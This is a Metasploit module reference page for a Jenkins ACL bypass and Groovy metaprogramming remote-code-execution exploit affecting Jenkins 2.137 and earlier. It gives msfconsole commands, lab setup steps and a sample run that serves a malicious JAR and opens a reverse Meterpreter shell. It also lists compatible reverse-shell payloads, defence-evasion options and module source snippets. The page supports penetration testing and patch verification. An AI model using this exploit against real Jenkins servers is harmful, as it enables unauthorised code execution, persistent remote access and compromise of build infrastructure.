Jenkins ACL Bypass and Metaprogramming RCE - Metasploit


This page contains detailed information about how to use the exploit/multi/http/jenkins_metaprogramming metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Jenkins ACL Bypass and Metaprogramming RCE
Module: exploit/multi/http/jenkins_metaprogramming
Source code: modules/exploits/multi/http/jenkins_metaprogramming.rb
Disclosure date: 2019-01-08
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): cmd, java
Supported platform(s): Java, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2018-1000408, CVE-2018-1000861, CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002, CVE-2019-1003005, CVE-2019-1003029

This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. When the "Java Dropper" target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE. When the "Unix In-Memory" target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution. The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/multi/http/jenkins_metaprogramming
msf exploit(jenkins_metaprogramming) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Introduction


This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file.

When the Java Dropper target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE.

When the Unix In-Memory target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution.

The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins.

Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.

Setup


  1. git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  2. cd cve-2019-1003000-jenkins-rce-poc/sample-vuln
  3. Edit run.sh and change 2.152-alpine to 2.137
  4. ./run.sh

Targets


Id  Name
--  ----
0   Unix In-Memory
1   Java Dropper

Options


RPORT

Set this to the Jenkins port. The default is 8080.

TARGETURI

Set this to the Jenkins base path. The default is /.

SRVPORT

Set this to the port on which to serve the payload. Change it from 8080 to something like 8081 if you are testing Jenkins locally on port 8080.

This option is valid only for the Java Dropper target.

ForceExploit

Set this to true to override the check result during exploitation.

Usage


msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Configuring Java Dropper target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 6f21b8da2915
OS          : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the multi/http/jenkins_metaprogramming exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/jenkins_metaprogramming

[*] Using configured payload java/meterpreter/reverse_https
msf6 exploit(multi/http/jenkins_metaprogramming) > show info

       Name: Jenkins ACL Bypass and Metaprogramming RCE
     Module: exploit/multi/http/jenkins_metaprogramming
   Platform: Unix, Java
       Arch: cmd, java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-01-08

Provided by:
  Orange Tsai
  Mikhail Egorov
  George Noseevich
  wvu <[email protected]>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix In-Memory
  1   Java Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path to Jenkins
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Jenkins dynamic routing to 
  bypass the Overall/Read ACL and leverage Groovy metaprogramming to 
  download and execute a malicious JAR file. When the "Java Dropper" 
  target is selected, the original entry point based on 
  classLoader.parseClass is used, which requires the use of Groovy 
  metaprogramming to achieve RCE. When the "Unix In-Memory" target is 
  selected, a newer, higher-level, and more universal entry point 
  based on GroovyShell.parse is used. This permits the use of 
  in-memory arbitrary command execution. The ACL bypass gadget is 
  specific to Jenkins <= 2.137 and will not work on later versions of 
  Jenkins. Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 
  2.61.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-1000861
  https://nvd.nist.gov/vuln/detail/CVE-2019-1003000
  https://nvd.nist.gov/vuln/detail/CVE-2019-1003001
  https://nvd.nist.gov/vuln/detail/CVE-2019-1003002
  https://nvd.nist.gov/vuln/detail/CVE-2019-1003005
  https://nvd.nist.gov/vuln/detail/CVE-2019-1003029
  https://www.exploit-db.com/exploits/46427
  https://jenkins.io/security/advisory/2019-01-08/
  https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
  https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
  https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  https://twitter.com/orange_8361/status/1126829648552312832
  https://github.com/orangetw/awesome-jenkins-rce-2019

Module Options


This is a complete list of options available in the multi/http/jenkins_metaprogramming exploit:

msf6 exploit(multi/http/jenkins_metaprogramming) > show options

Module options (exploit/multi/http/jenkins_metaprogramming):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to Jenkins
   VHOST                       no        HTTP server virtual host

Payload options (java/meterpreter/reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   1   Java Dropper

Advanced Options


Here is a complete list of advanced options supported by the multi/http/jenkins_metaprogramming exploit:

msf6 exploit(multi/http/jenkins_metaprogramming) > show advanced

Module advanced options (exploit/multi/http/jenkins_metaprogramming):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_https):

   Name                         Current Setting                                                Required  Description
   ----                         ---------------                                                --------  -----------
   AutoLoadStdapi               true                                                           yes       Automatically load the Stdapi extension
   AutoRunScript                                                                               no        A script to run automatically on session creation.
   AutoSystemInfo               true                                                           yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false                                                          yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30                                                             no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false                                                          no        Encode the second stage payload
   EnableUnicodeEncoding        false                                                          yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                                                              no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                                                                  no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                                                              no        An optional value to use for the Host HTTP header
   HttpReferer                                                                                 no        An optional value to use for the Referer HTTP header
   HttpServerName               Apache                                                         no        The server header that the handler will send in response to requests
   HttpUnknownRequestResponse   <html><body><h1>It works!</h1></body></html>                   no        The returned HTML response body when the handler receives a request that is not from a payload
   HttpUserAgent                Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko  no        The user-agent that the payload should use for communication Max parameter length: 255 characters
   IgnoreUnknownPayloads        false                                                          no        Whether to drop connections from payloads using unknown UUIDs
   InitialAutoRunScript                                                                        no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false                                                          no        Run the payload in debug mode, with logging enabled
   OverrideLHOST                                                                               no        When OverrideRequestHost is set, use this value as the host name for secondary requests
   OverrideLPORT                                                                               no        When OverrideRequestHost is set, use this value as the port number for secondary requests
   OverrideRequestHost          false                                                          no        Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
   OverrideScheme                                                                              no        When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
   PayloadProcessCommandLine                                                                   no        The displayed command line that will be used by the payload
   PayloadUUIDName                                                                             no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                                                              no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                                                                             no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false                                                          yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                                                              yes       How many additional successful pingbacks
   PingbackSleep                30                                                             yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false                                                          yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                                                                  no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                                                                     no        The port to bind to on the local system if different from LPORT
   SessionCommunicationTimeout  300                                                            no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800                                                         no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600                                                           no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10                                                             no        Number of seconds to wait between reconnect attempts
   Spawn                        2                                                              yes       Number of subprocesses to spawn
   StageEncoder                                                                                no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                                                                   no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true                                                           no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerURILength                                                                             no        The URI length for the stager (at least 5 bytes)
   StagerVerifySSLCert          false                                                          no        Whether to verify the SSL certificate in Meterpreter
   VERBOSE                      false                                                          no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/jenkins_metaprogramming module can exploit:

msf6 exploit(multi/http/jenkins_metaprogramming) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix In-Memory
   1   Java Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/jenkins_metaprogramming exploit:

msf6 exploit(multi/http/jenkins_metaprogramming) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/jenkins_metaprogramming exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/jenkins_metaprogramming) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Jenkins version not detected


Here is a relevant code snippet related to the "Jenkins version not detected" error message:

102:	      'uri'      => go_go_gadget1('/search/index'),
103:	      'vars_get' => {'q' => 'a'}
104:	    )
105:	
106:	    unless res && (version = res.headers['X-Jenkins'])
107:	      vprint_error('Jenkins version not detected')
108:	      return CheckCode::Unknown
109:	    end
110:	
111:	    vprint_status("Jenkins #{version} detected")
112:	    checkcode = CheckCode::Detected

Jenkins <VERSION> is not a supported target


Here is a relevant code snippet related to the "Jenkins <VERSION> is not a supported target" error message:

110:	
111:	    vprint_status("Jenkins #{version} detected")
112:	    checkcode = CheckCode::Detected
113:	
114:	    if Rex::Version.new(version) > target['Version']
115:	      vprint_error("Jenkins #{version} is not a supported target")
116:	      return CheckCode::Safe
117:	    end
118:	
119:	    vprint_good("Jenkins #{version} is a supported target")
120:	    checkcode = CheckCode::Appears

ACL bypass unsuccessful


Here is a relevant code snippet related to the "ACL bypass unsuccessful" error message:

121:	
122:	    if res.body.include?('Administrator')
123:	      vprint_good('ACL bypass successful')
124:	      checkcode = CheckCode::Vulnerable
125:	    else
126:	      vprint_error('ACL bypass unsuccessful')
127:	      return CheckCode::Safe
128:	    end
129:	
130:	    checkcode
131:	  end

Ignoring <REQUEST.METHOD> request


Here is a relevant code snippet related to the "Ignoring <REQUEST.METHOD> request" error message:

229:	  #
230:	  def on_request_uri(cli, request)
231:	    vprint_status("#{request.method} #{request.uri} requested")
232:	
233:	    unless %w[HEAD GET].include?(request.method)
234:	      vprint_error("Ignoring #{request.method} request")
235:	      return
236:	    end
237:	
238:	    if request.method == 'HEAD'
239:	      if request.uri != payload_uri

Sending 404


Here is a relevant code snippet related to the "Sending 404" error message:

235:	      return
236:	    end
237:	
238:	    if request.method == 'HEAD'
239:	      if request.uri != payload_uri
240:	        vprint_error('Sending 404')
241:	        return send_not_found(cli)
242:	      end
243:	
244:	      vprint_good('Sending 200')
245:	      return send_response(cli, '')

Sending bogus file


Here is a relevant code snippet related to the "Sending bogus file" error message:

244:	      vprint_good('Sending 200')
245:	      return send_response(cli, '')
246:	    end
247:	
248:	    if request.uri != payload_uri
249:	      vprint_error('Sending bogus file')
250:	      return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
251:	    end
252:	
253:	    vprint_good('Sending payload JAR')
254:	    send_response(

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Orange Tsai
  • Mikhail Egorov
  • George Noseevich
  • wvu

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.